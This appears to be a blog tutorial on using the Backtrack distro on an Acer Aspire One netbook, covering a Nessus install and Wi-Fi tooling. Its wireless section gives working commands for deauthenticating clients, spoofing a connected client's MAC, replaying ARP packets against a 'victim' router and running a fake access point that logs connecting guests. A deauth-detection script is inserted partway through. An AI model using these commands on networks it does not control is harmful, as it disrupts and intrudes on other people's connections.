Introduction
After getting my netbook, what to do next? Hmmm, maybe taking advantage of its great Atheros card to "play" for a while?? Alright!! In this post I will write tips, tricks and howtos to take advantage of the Backtrack security distro http://www.remote-exploit.org/backtrack.html for fun.
Contents
- Backtrack 3/4 on Acer Aspire One
- Introduction
- Installation on a Hard Drive
- Installing Nessus
- Playing with Wireless
- First steps
- Starting kismet
- Create a new interface with monitor mode enabled
- Capturing packets focusing on one AP
- Send disassociation frames to a specific client (connected)
- Replaying arp packets
- Debugging network traces with tcpdump
- Connect to a Wep protected network
- Startup a fake access point to share your internet access
- Software AP with airbase-ng
- Other stuff
- Links
Installation on a Hard Drive
You can run Backtrack3 from a pendrive as a live CD system without problems, but you can also copy it to your hard drive and keep your changes after every reboot.
To do so just follow this howto, which I find great: http://kin.calvin.free.fr/blog/?p=16. In my case I kept the boot loader that comes with the Linpus distro installed originally. As you can see in my post about this netbook, Grub behaves strangely when you want to boot more than one system (check AspireOnePost).
With this in mind, go to the Grub configuration file, which should be at /boot/grub/grub.conf, and add the following lines after the Linpus Linux boot parameters. I will also show the parameters for booting Windows in case you also want to install it. Take care with the partition numbers, as they don't have to be the same as mine.
default=0
timeout=5
splashimage=(hd0,0)/boot/grub/cbg2.xpm.gz
hiddenmenu

title Linpus Linux
rootnoverify (hd0,0)
kernel /boot/bzImage ro root=LABEL=linpus vga=0x311 splash=quiet loglevel=1 console=tty1 nolapic_timer
initrd /boot/initrd-splash.img

title Backtrack 3
rootnoverify (hd0,1)
kernel /boot/vmlinuz ro root=/dev/sda2 vga=0x0F05

title Windous XP
root (hd0,2)
makeactive
chainloader +1

Keep an eye on the Grub syntax: (hd0,0) refers to the first partition on the first disk. Thus you can see that Backtrack was installed on the second partition.
Installing Nessus
If you meet the requirement of being a home user, you can use the Nessus vulnerability scanner by doing the following:
- Download the Nessus and NessusClient Fedora Core 8 RPMs from the Nessus website; it's important to choose the Fedora 8 binaries.
- Convert them to TGZ:
rpm2tgz Nessus-3.2.x-fc8.i386.rpm
rpm2tgz NessusClient-3.2.x-fc8.i386.rpm
- Use pkgtool (in the same directory where you downloaded the client and server); it provides an ncurses interface that will install those two packages:
pkgtool
- Configure things a bit (put the libraries where appropriate and so on):
cd /opt/
# no trailing colon on PATH: an empty entry would add the current directory to the search path
export PATH=$PATH:/opt/nessus/sbin:/opt/nessus/bin
cp /usr/lib/libssl.so /lib
cp /usr/lib/libcrypto.so /lib
cp /opt/nessus/lib/libnessus.so.3 /lib
cp /opt/nessus/lib/libnessusrx.so.0 /lib
cp /opt/nessus/lib/libpcap-nessus.so.3 /lib
cd /lib
ln libssl.so libssl.so.6
ln libcrypto.so libcrypto.so.6
echo "/opt/nessus/lib" >> /etc/ld.so.conf
ldconfig
- Then add the users that can use Nessus (it requires authentication):
/opt/nessus/sbin/nessus-mkcert
/opt/nessus/sbin/nessus-adduser
- Finally, register Nessus and, with the key they will provide you, update the plugins this way (note: it takes some time to update all plugins):
cd /opt/nessus/etc/nessus
nessus-fetch --register XXX-YYY-ZZZ-VVV
- To run the server just type:
/opt/nessus/sbin/nessusd
The client should be located on your Internet applications menu or in this path:
/opt/nessus/bin/NessusClient
Playing with Wireless
First steps
The Aspire One comes with a nice Atheros wireless card, and Backtrack3 has the drivers needed to put the card in monitor mode (sniffing) or to reinject packets. To use all this functionality you should get used to the wlanconfig, airmon-ng, aircrack-ng and aireplay-ng tools.
Starting kismet
First you have to edit its config file and modify the following line:
vi /usr/local/etc/kismet.conf
source=madwifi_ag,wifi0,madwifi-ng
# afterwards just launch kismet:
kismet
Kismet will create a dedicated new interface. If you are capturing packets on a certain channel with another interface, Kismet will cause trouble by starting to channel-hop on the other interfaces in use, so take care when running Kismet together with, for example, airodump-ng.
Create a new interface with monitor mode enabled
airmon-ng stop ath0
airmon-ng start wifi0
Capturing packets focusing on one AP
airodump-ng --bssid <victim_router_mac> -c <channel_used_by_victim_router> -w <file> <wireless_iface>
Send disassociation frames to a specific client (connected)
aireplay-ng -0 5 -e <ESSID> -a <router_mac> -c <connected_client_mac> <wifi_iface>
Replaying arp packets
In order for the replay to be effective you have to be associated with the AP. You can achieve this with the following command, where the fake MAC is the MAC of an already connected client. Otherwise, if you are replaying packets from a non-associated client, the AP will discard them.
aireplay-ng -1 30 -e '<ESSID>' -a <BSSID> -h <Fake MAC> ath0
Some APs prefer this form of association:
aireplay-ng -1 6000 -o 1 -q 10 -e '<ESSID>' -a <BSSID> -h <Fake MAC> ath0
Where:
- 6000 - Reauthenticate every 6000 secs
- -o 1 - Send only one type of packet each time; by default different types of association frames are sent, which could confuse the AP.
- -q 10 - Send keepalive packets every 10 secs (keepalive is not the same as reauthentication).
Debugging network traces with tcpdump
tcpdump -n -e -s0 -vvv -i <iface>
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:46:11:19 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
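The same tcpdump output is what a defender would watch to notice the deauthentication flood described in the section above. The following is an added example, not code from the original post: a sliding-window counter over constructed tcpdump-style lines that flags a (BSSID, client) pair receiving too many deauth/disassoc frames in a short interval. The MAC addresses, timestamps, threshold of 5 frames and 1-second window are assumptions chosen for the sample.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches the 802.11 management frames that "tcpdump -n -e" prints on a
# monitor-mode interface (same layout as the trace line shown above).
FRAME_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) .*?BSSID:(?P<bssid>[0-9a-f:]{17}) "
    r"DA:(?P<da>[0-9a-f:]{17}) SA:(?P<sa>[0-9a-f:]{17}) "
    r"(?P<kind>DeAuthentication|Disassociation)", re.IGNORECASE)

# Constructed sample trace (MACs and times are made up): five deauth frames
# to one client within a quarter of a second, a beacon, and one isolated
# deauth 35 seconds later that should not raise an alert on its own.
SAMPLE_TRACE = """\
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:46:11:19 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
11:04:34.412100 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:46:11:19 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
11:04:34.470300 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:46:11:19 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
11:04:34.530900 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:46:11:19 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
11:04:34.590200 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:46:11:19 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
11:04:34.700000 314us BSSID:00:14:6c:7e:40:80 DA:ff:ff:ff:ff:ff:ff SA:00:14:6c:7e:40:80 Beacon (HOME) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 9
11:05:10.100000 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:46:11:19 SA:00:14:6c:7e:40:80 DeAuthentication: Deauthenticated because sending station is leaving
"""


def find_deauth_bursts(trace, threshold=5, window=timedelta(seconds=1)):
    """Return one alert per (BSSID, client) pair that receives at least
    `threshold` deauth/disassoc frames inside any `window`-long interval."""
    recent = defaultdict(deque)  # (bssid, da) -> timestamps still inside the window
    alerted, alerts = set(), []
    for line in trace.splitlines():
        m = FRAME_RE.match(line)
        if not m:
            continue  # beacons, probes and data frames are not counted
        ts = datetime.strptime(m["ts"], "%H:%M:%S.%f")
        key = (m["bssid"].lower(), m["da"].lower())
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # slide the window forward
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"bssid": key[0], "client": key[1], "frames": len(q),
                           "first": q[0].strftime("%H:%M:%S.%f")})
    return alerts
```

On the sample above it reports one burst of 5 frames to 00:0f:b5:46:11:19 starting at 11:04:34.360700; the single late deauth is ignored because the window has moved on. Feed it real output with `tcpdump -n -e -i <monitor iface> | python3 -c ...` or a saved trace file.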
Connect to a WEP protected network
iwconfig ath0 key <s:ASCII string of key> essid <essid>
dhclient ath0
Startup a fake access point to share your internet access
Modify it for your needs (networks, ESSID, IPs, gateway, etc.).
- WAN == ETH0 (ethernet, Internet side)
- LAN == ATH0 (wireless)
- 10.0.0.0/24 == ATH0 LAN
- 192.168.1.0/24 == ETH0 LAN
- 192.168.1.1 == ETH0 GATEWAY
- 10.0.0.1 == ATH0 GATEWAY (the Aspire one)
Note: from the Backtrack 4 release, the wlanconfig command to put the wireless card in master or AP mode won't work, as by default it loads the ath5k driver, which does not support those ioctl calls. You can still get a fake AP by using the airbase-ng script. Otherwise, install the madwifi ath_pci driver by hand: http://forums.remote-exploit.org/backtrack-4-non-working-hardware/24348-atheros-ar5007eg-ath_pci-error.html
IPT="/usr/sbin/iptables"
WAN="eth0"
LAN="ath0"

# wifi stuff
echo "destroying atheros ifaces"
wlanconfig ath1 destroy
wlanconfig ath0 destroy
echo "creating ath0 as a master device"
wlanconfig ath0 create wlandev wifi0 wlanmode master
sleep 2
iwconfig ath0 essid HOME
echo "configuring IPs and default route"
ifconfig ath0 10.0.0.1 netmask 255.255.255.0 up
ifconfig eth0 192.168.1.111 netmask 255.255.255.0 up
route add default gw 192.168.1.1
echo "starting dhcp"
/etc/rc.d/rc.dhcpd start
echo "enabling forwarding"
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "establishing IPtables nat rules"
$IPT -t nat -A POSTROUTING -o $WAN -j MASQUERADE
The DHCP server config I used is the following:
bt ~ # cat /etc/dhcpd.conf
option domain-name-servers 4.2.2.2;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
    range 10.0.0.100 10.0.0.254;
    option routers 10.0.0.1;
    option domain-name-servers 4.2.2.2;
}
As you can see, I used the local7 facility, which I dump to a separate file that I monitor to check when I have dear guests:
bt ~ # cat /etc/syslog.conf
# /etc/syslog.conf
# For info about the format of this file, see "man syslog.conf"
# and /usr ...
...
....
#
#DHCP LOGS
#
local7.* -/var/log/dhcp.log
Software AP with airbase-ng
The aim of airbase-ng is to respond to any probe packet from connecting clients; we can use it to start a fake AP that listens for one ESSID at a time. This can be useful when you run Backtrack 4 final on the Aspire One and find that the wlanconfig suite of commands does not work.
# we create a monitor mode interface (mon0 will be created)
airmon-ng start wlan0
# start our fake ap listening on channel 5, beaconing every 100 milliseconds, publishing a "test" essid
airbase-ng -I 100 -c 5 --essid test mon0
# the at0 interface will be created; as in the previous section we can set up a dhcp server so that it listens on the at0 interface
Other stuff
To remove an interface (when wlanconfig stop does not work due to ath5k use) we can do it like this:
iw dev mon0 interface del
To lock the card to a specific mode, use:
- iwpriv ath0 mode 11a - To lock to 11a only.
- iwpriv ath0 mode 11b - To lock to 11b only.
- iwpriv ath0 mode 11g - To lock to 11g only.
- iwpriv ath0 mode 0 - (default) autoselect mode.
Changing authentication mode. Use:
- iwpriv ath0 authmode 1 - To use open authentication.
- iwpriv ath0 authmode 2 - To use shared key authentication.
- iwpriv ath0 authmode 3 - To use 802.1x authentication.
Manipulating the MAC white/black list. Use:
- iwpriv ath0 maccmd 3 - To clear the MAC list.
- iwpriv ath0 maccmd 1 - To make the list a whitelist.
- iwpriv ath0 maccmd 2 - To make the list a blacklist.
- iwpriv ath0 addmac 00:11:22:33:44:55 - To add a MAC address to the list.
- iwpriv ath0 delmac 00:11:22:33:44:55 - To delete a MAC from the list.
- iwpriv ath0 kickmac 00:11:22:33:44:55 - To send a disassociation frame to an associated station.
Links
- BT3 installation to hard disk http://kin.calvin.free.fr/blog/?p=16
- Installing nessus http://www.voipsec.eu/?p=205
- Interesting post (Spanish): http://kungfoosion.blogspot.com/2009/11/karmetasploit-en-backtrack-4.html
- Another interesting post (Spanish) that includes launching some nice tools: http://opensec.es/2009/10/05/creando-un-punto-de-acceso-falso-ii/
- A bit of information about the 3 types of madwifi drivers http://www.guatewireless.org/internetworking/redes/wireless/madwifi-instalando-atheros-wireless-card-sobre-linux/
- Funniest ever: http://www.ex-parrot.com/~pete/upside-down-ternet.html